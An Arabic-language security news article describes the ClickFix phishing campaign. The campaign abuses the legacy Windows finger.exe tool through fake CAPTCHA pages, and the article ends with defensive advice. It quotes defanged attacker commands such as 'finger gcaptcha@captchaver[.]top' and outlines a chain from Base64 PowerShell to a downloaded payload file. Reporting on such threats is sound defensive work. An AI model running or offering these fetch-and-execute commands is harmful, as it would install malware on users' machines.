كشفت تقارير أمنية عن حملة تصيد احتيالي جديدة تستغل أداة Windows قديمة تُعرف باسم finger.exe لتثبيت برمجيات خبيثة على أجهزة المستخدمين. وتعتمد هذه الحملة، المسماة ClickFix، على خداع المستخدمين عبر صفحات تحقق زائفة تدفعهم إلى تشغيل تعليمات برمجية ضارة، مما يفتح الباب أمام اختراق أنظمتهم.
بدأت هذه الهجمات في الظهور منذ أواخر العام الماضي، وتشكل تهديدًا مستمرًا بفضل ابتكارها في استغلال الثغرات الأمنية. تعتمد الطريقة بشكل أساسي على بروتوكول finger، وهو أداة شبكات قديمة تستخدم للحصول على معلومات حول المستخدمين.
حملة ClickFix تستغل بروتوكول finger.exe القديم
تتميز حملة ClickFix باستخدامها لبروتوكول finger، وهي أداة شبكات لم تعد شائعة الاستخدام، مما يجعلها بعيدة عن أنظار معظم إجراءات الأمان الحديثة. يقوم المهاجمون بإساءة استخدام هذه الأداة لجلب حمولات خبيثة من خوادم بعيدة.
يسمح هذا الأسلوب للمهاجمين بتجاوز بعض آليات الحماية التي قد لا تكون مصممة لمراقبة أو حظر حركة المرور عبر منفذ TCP 79 المخصص لبروتوكول finger. ووفقًا لمحللي مركز Internet Storm Center، تم رصد حملتين رئيسيتين تستخدمان هذه التقنية: KongTuke و SmartApeSG.
صفحات تحقق CAPTCHA وهمية
تعتمد كلتا الحملتين على صفحات تحقق CAPTCHA وهمية لجذب المستخدمين وتشجيعهم على تنفيذ أمر finger الأولي. وتوضح هذه المنهجية المشتركة فاعلية الأساليب القديمة عند استخدامها بطرق مبتكرة.
إن الاستخدام المستمر لهذه التقنية يبرز فعاليتها في البيئات التي لا تكون فيها البروتوكولات القديمة مؤمنة بشكل كافٍ. عند تشغيل أمر finger، يتصل الخادم بخادم قيادة وتحكم. على سبيل المثال، تستخدم حملة KongTuke أمرًا مثل: finger gcaptcha@captchaver[.]top.
يقوم الخادم بالرد بأمر PowerShell يتضمن نصًا مشفرًا بـ Base64، والذي يتم تنفيذه بعد ذلك على جهاز المستخدم لتنفيذ المزيد من الأنشطة الخبيثة. تعمل حملة SmartApeSG بشكل مشابه، حيث تستخدم أمرًا مثل: finger [email protected][.]108 لجلب نص برمجي.
يقوم هذا النص البرمجي بعد ذلك بتنزيل وتنفيذ ملف خبيث، حيث يظهر النص البرمجي وهو يجلب ملفًا يسمى yhb.jpg يحتوي على الحمولة الخبيثة. تسمح هذه العملية متعددة المراحل للبرمجيات الخبيثة بالاستقرار على النظام المخترق.
على الرغم من أن الشبكات المؤسسية التي تستخدم وكلاء صريحين قد تحظر منفذ TCP 79، إلا أن العديد من الأنظمة تظل عرضة للخطر إذا لم يتم حظر هذا المنفذ صراحةً. وهذا يجعل هجمات ClickFix مصدر قلق مستمر لمسؤولي الشبكات.
يُنصح المستخدمون بتوخي الحذر الشديد عند التعامل مع أي طلبات للتحقق أو تحديثات، خاصة تلك التي تطلب تشغيل أوامر برمجية. كما ينبغي على مسؤولي تكنولوجيا المعلومات التأكد من أن بروتوكولات الشبكات القديمة، مثل finger، معطلة أو مراقبة بشكل فعال ضمن بيئاتهم.